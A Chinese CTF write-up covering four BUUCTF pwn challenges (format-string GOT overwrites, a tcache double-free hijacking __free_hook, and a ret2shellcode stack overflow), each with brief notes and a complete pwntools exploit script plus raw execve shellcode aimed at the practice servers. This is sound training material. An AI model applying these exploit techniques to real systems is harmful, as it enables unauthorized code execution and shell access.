PWN-PRACTICE-BUUCTF-21

• • wdb_2018_2nd_easyfmt
  • ciscn_2019_es_1
  • axb_2019_fmt64
  • x_ctf_b0verfl0w

wdb_2018_2nd_easyfmt

格式化字符串漏洞
第一次printf通過printf_got將printf的實際地址打印出來，計算libc基地址，得到system的實際地址
第二次printf通過printf_got將printf的實際地址改寫為system的實際地址，這樣之后的printf實際上是執行的system
第三次輸入"/bin/sh\x00"，即會執行system("/bin/sh\x00")

# -*- coding:utf-8 -*- from pwn import * #context.log_level='debug' #io=process('./wdb_2018_2nd_easyfmt') io=remote('node4.buuoj.cn',27039) elf=ELF('./wdb_2018_2nd_easyfmt') libc=ELF('./libc-2.23-16-x32.so') printf_got=elf.got["printf"] payload=p32(printf_got)+"%6$s" io.sendlineafter("repeater?\n",payload) printf_addr=u32(io.recvuntil('\xf7')[-4:]) print("printf_addr=="+hex(printf_addr)) libc_base=printf_addr-libc.symbols["printf"] system_addr=libc_base+libc.symbols['system'] print("system_addr=="+hex(system_addr)) payload=fmtstr_payload(6,{printf_got:system_addr}) io.sendline(payload) io.sendline('/bin/sh\x00') io.interactive()

ciscn_2019_es_1

tcache
參考：ciscn_2019_es_1

# -*- coding:utf-8 -*- from pwn import * #io=process("./ciscn_2019_es_1") io=remote("node4.buuoj.cn",28810) elf=ELF("./ciscn_2019_es_1") libc=ELF("./libc-2.27-18-x64.so")def add(name_size,name,com_call):io.sendlineafter("choice:","1")io.sendlineafter("the size of compary's name\n",str(name_size))io.sendlineafter("input name:\n",name)io.sendlineafter("input compary call:\n",com_call) def show(index):io.sendlineafter("choice:","2")io.sendlineafter("input the index:\n",str(index)) def free(index):io.sendlineafter("choice:","3")io.sendlineafter("input the index:",str(index)) def exit():io.sendlineafter("choice:","4")#gdb.attach(io) #pause()add(0x410,"aaaa","130")#0 add(0x28,"bbbb","131")#1 add(0x68,"/bin/sh\x00","132")#2#pause()free(0)#pause()show(0) libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-96-0x10-libc.sym["__malloc_hook"] free_hook=libc_base+libc.sym["__free_hook"] system=libc_base+libc.sym["system"]#pause()free(1)#pause()free(1)#pause()add(0x28,p64(free_hook),"133")#3#pause()add(0x28,"dddd","134")#4#pause()add(0x28,p64(system),"135")#5#pause()free(2)#pause()io.interactive()

axb_2019_fmt64

格式化字符串漏洞，參考：[BUUCTF]PWN——axb_2019_fmt64（64位格式化字符串改got表）

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./axb_2019_fmt64") io=remote("node4.buuoj.cn",26526) elf=ELF("./axb_2019_fmt64") libc=ELF("./libc-2.23-16-x64.so") strlen_got=elf.got["strlen"]io.recvuntil("Please tell me:") payload="%9$saaaa"+p64(strlen_got) io.sendline(payload) strlen_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("strlen_addr=="+hex(strlen_addr)) libc_base=strlen_addr-libc.sym["strlen"] system=libc_base+libc.sym["system"] print("system=="+hex(system)) high_sys=(system>>16)&0xff low_sys=system&0xffffio.recvuntil("Please tell me:") payload="%"+str(high_sys-9)+"c%12$hhn" payload+="%"+str(low_sys-high_sys)+"c%13$hn" #print(len(payload))#25 payload=payload.ljust(32,"a") print(len(payload))#32 payload+=p64(strlen_got+2)+p64(strlen_got)#12 13 io.sendline(payload)io.recvuntil("Please tell me:") io.sendline(";/bin/sh\x00") io.sendline("cat flag")io.interactive()

x_ctf_b0verfl0w

32位elf，NX disabled，堆棧可執行
棧溢出，通過移動棧頂指針esp，實現ret2shellcode

# -*- coding:utf-8 -*- from pwn import * #context.log_level='debug' #io=process('./x_ctf_b0verfl0w') io=remote('node4.buuoj.cn',27191) elf=ELF('./x_ctf_b0verfl0w') jmp_esp=0x08048504 shellcode="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" payload=shellcode.ljust(0x24,'a') payload+=p32(jmp_esp) payload+=asm('sub esp, 0x28;jmp esp') io.recvuntil('name?\n') io.sendline(payload) io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-21的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。